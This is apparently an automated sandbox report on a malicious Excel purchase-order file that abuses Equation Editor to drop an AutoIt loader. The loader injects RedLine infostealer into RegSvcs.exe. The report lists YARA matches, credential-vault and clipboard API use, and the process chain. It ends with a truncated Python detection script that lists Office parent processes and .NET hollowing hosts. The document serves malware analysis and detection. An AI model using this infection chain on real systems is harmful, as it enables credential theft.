                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608397603.00000000005B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/T
                  Source: RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                  Source: RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                  Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.22:49162 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, abAX9N.cs.Net Code: _7wfqbBU
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EBEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,3_2_00EBEAFF
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EBED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,3_2_00EBED6A
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EAAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,3_2_00EAAA57
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00ED9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_00ED9576

                  System Summary

                  Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 3.2.CKK.exe.140000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                  Source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
Source: CKK.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: CKK.exe, 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_f4a7f36d-1)
Source: CKK.exe, 00000003.00000002.447747502.0000000000F02000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_d9a6df5a-0)
Source: CKK.exe.2.dr | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_9ae924c8-b)
Source: CKK.exe.2.dr | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer (memstr_cbbf9510-c)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\CKK.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CKK.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EAD5EB: CreateFileW,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EA1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EAE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E48060
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB2046
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EA8298
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E7E4FF
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E7676B
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00ED4873
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E4CAF0
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E6CAA0
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E5CC39
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E76DD9
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E5D071
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E491C0
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E5B119
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E61394
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E61706
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E6781B
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E619B0
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E5997D
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E47920
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E67A4A
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E67CA7
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E61C77
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E79EEE
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00ECBE44
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E61F32
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00113640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0040DC11
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00407C3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00418CCC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00406CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004028B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0041A4BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00418244
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00401650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00402F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004193C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00418788
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00402F89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00402B90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_004073A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0027D428
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0027C810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00271030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00270E7B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_0027CB58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D30FC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D334C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D6AC08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D66508
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D69A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D63208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D68C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D6BD18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D6513C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D668C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4_2_00D632C1
Source: PO 2_5_24.xlam.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: String function: 00E60A30 appears 46 times
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: String function: 00E5F9F2 appears 40 times
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: String function: 00E49CB3 appears 31 times
Source: sheet1.xml, type: SAMPLE | Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.CKK.exe.140000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, RsYAkkzVoy.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, Kqqzixk.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, xROdzGigX.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, ywes.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, iPVW0zV.cs | Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, 1Pi9sgbHwoV.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, YUgDfWK2g4.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, YUgDfWK2g4.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, MarWtcu.cs | Cryptographic APIs: 'TransformFinalBlock' (4 occurrences)
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winXLSX@6/8@2/2
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB37B5 GetLastError,FormatMessageW
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EA10BF AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EA16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00ECA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00EB648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize
Source: C:\Users\user\AppData\Roaming\CKK.exe | Code function: 3_2_00E442A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$PO 2_5_24.xlam.xlsx
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR64BB.tmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: PO 2_5_24.xlam.xlsx | Virustotal: Detection: 53%
Source: PO 2_5_24.xlam.xlsx | ReversingLabs: Detection: 63%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\CKK.exe "C:\Users\user\AppData\Roaming\CKK.exe"
Source: C:\Users\user\AppData\Roaming\CKK.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\CKK.exe"
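The four "Process created" lines above are the whole infection chain: Excel activates the Equation Editor OLE server, EQNEDT32.EXE drops CKK.exe into %AppData% and runs it, and CKK.exe starts RegSvcs.exe with CKK.exe's own path as the command line. The Python below is an added example, not part of the Joe Sandbox report and not any vendor's Sigma content; it encodes those four observations as rules and runs them over process-creation events constructed from the lines above. The parent of EXCEL.EXE is not given in the report and is left empty, and the OFFICE_PARENTS, DOTNET_HOSTS and USER_WRITABLE lists are assumptions for the demonstration, not values taken from the report.

```python
"""Process-chain detection for the behaviour this report records:
EXCEL.EXE -> EQNEDT32.EXE -> CKK.exe (in %AppData%) -> RegSvcs.exe started
with CKK.exe's command line. Added example, not Joe Sandbox code; the events
below are constructed from the report's 'Process created' lines."""
import ntpath
from dataclasses import dataclass

# Parents whose children deserve a rule. Equation Editor is included because
# Office activates it as an OLE server, yet it should never spawn anything.
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "eqnedt32.exe"}  # assumed list
EQUATION_EDITOR = "eqnedt32.exe"
# Signed .NET utilities commonly used as hollowing hosts by stealers (assumed list).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "msbuild.exe", "installutil.exe"}
# Path fragments that mark user-writable locations (assumed list).
USER_WRITABLE = ("\\appdata\\", "\\users\\public\\", "\\temp\\", "\\programdata\\")


@dataclass
class ProcEvent:
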